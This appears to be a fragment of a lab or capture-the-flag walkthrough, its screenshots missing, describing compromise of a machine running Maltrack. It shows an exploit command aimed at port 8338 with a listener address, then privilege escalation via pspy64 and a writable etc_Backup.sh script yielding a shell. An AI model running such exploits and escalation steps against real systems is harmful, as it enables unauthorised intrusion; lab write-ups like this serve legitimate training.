8338

Using this exploit for Maltrack 0.53 but it might work on 0.52:
python3 exploit.py 192.168.45.229 8338 http://192.168.182.32:8338Setting up a listener:

Running pspy64:
Checking permissions for etc_Backup.sh:
We can write to it.
Now we get a shell:
We used penelope to catch the shell in this image.
Last updated
Was this helpful?